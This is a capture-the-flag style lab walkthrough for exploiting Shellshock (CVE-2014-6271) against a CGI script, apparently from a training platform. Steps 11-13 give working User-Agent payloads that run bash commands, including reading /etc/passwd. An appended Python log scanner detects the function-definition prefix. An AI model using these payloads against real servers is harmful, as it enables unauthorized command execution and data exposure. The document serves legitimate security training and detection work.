
10.) Shellshock

This document outlines the steps to exploit the Shellshock vulnerability in a web application. It includes commands for checking the target IP, scanning for open ports, and using Burp Suite to modify user-agent headers for executing malicious payloads. The document serves as a reference for completing the lab exercise, not as a comprehensive guide.

Uploaded by Harlian

Name: Shellshock

URL: https://www.attackdefense.com/challengedetails?cid=1911

Type: Webapp Pentesting Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Objective: Shellshock vulnerability.

Solution:

Step 1: Start a terminal and check the IP address of the host.

Command: ip addr

Step 2: Run Nmap scan on the target IP to find open ports.

Note: The target IP will be 192.242.220.3

Command: nmap 192.242.220.3


Port 80 is open

Step 3: Start Firefox and navigate to the target IP.

A website is running at port 80 of the target IP.

Step 4: Right-click and select "View Page Source".


A CGI script is running on the target server.

Step 5: Use the Nmap NSE script to check if the server is vulnerable to the Shellshock attack.

Command: nmap --script http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.242.220.3

The server is vulnerable to the Shellshock attack.

Step 6: Search for the available exploit for the Shellshock vulnerability.

Step 7: The GitHub link contains the steps to exploit the vulnerability.

URL: https://github.com/opsxcq/exploit-CVE-2014-6271

The attacker has to craft a malicious User-Agent header in order to exploit the vulnerability.

Step 8: Configure Firefox to use Burp Suite. Click on the FoxyProxy plugin icon on the top-right of the browser and select "Burp Suite".

Step 9: Start Burp Suite: navigate to the Web Application Analysis menu and select "burpsuite". Click on Next, then click on the Start Burp button.

Step 10: Reload the page and intercept the request with Burp Suite.

Right-click and select the "Send to Repeater" option, then navigate to the Repeater tab.

Step 11: Modify the User-Agent and inject the malicious payload.

Payload: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

Click on the Send button.


The command executed successfully.

Step 12: Modify the payload to execute the 'id' command.

Payload: () { :; }; echo; echo; /bin/bash -c 'id'

Step 13: Modify the payload to execute the 'ps -ef' command.

Payload: () { :; }; echo; echo; /bin/bash -c 'ps -ef'
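
Added example, not part of the original lab document: a web-server log check for the function-definition prefix that the payloads in Steps 11-13 place in the User-Agent. Because CGI exports every request header to the script as an environment variable, it also checks the request line and Referer, which goes beyond the single header used in the lab. The combined log format, the sample log lines and all function names are assumptions.

```python
import re

# Apache/Nginx "combined" log format; quoted fields may contain \" escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)
# Bash function-definition prefix that triggers CVE-2014-6271 when it opens an
# environment variable value. Whitespace is matched loosely on purpose.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')


def find_shellshock(lines):
    """Return one finding per log line whose request line, Referer or
    User-Agent contains a function-definition prefix."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, request, status, referer, agent = m.groups()
        fields = {"request": request, "referer": referer, "user-agent": agent}
        hits = [name for name, value in fields.items() if FUNC_DEF.search(value)]
        if hits:
            parts = request.split()
            path = parts[1] if len(parts) > 1 else ""
            findings.append({"line": lineno, "ip": ip, "path": path,
                             "status": int(status), "fields": hits})
    return findings


# Constructed sample log lines (assumed format and addresses, not lab output).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2024:13:55:36 +0000] "GET /gettime.cgi HTTP/1.1" 200 29 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"',
    '198.51.100.9 - - [10/Oct/2024:13:56:02 +0000] "GET /gettime.cgi HTTP/1.1" 200 1184 "-" "() { :; }; echo; echo; /bin/bash -c \'id\'"',
    '203.0.113.4 - - [10/Oct/2024:13:57:40 +0000] "GET /index.html HTTP/1.1" 404 196 "() { :;}; /bin/true" "curl/8.0"',
]

if __name__ == "__main__":
    for finding in find_shellshock(SAMPLE_LOG):
        print(finding)
```

A hit with status 200 on a CGI path, like the second sample line, is the one to triage first, since the script actually ran with the attacker-controlled header in its environment.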


References:
● Shellshock (https://github.com/opsxcq/exploit-CVE-2014-6271)
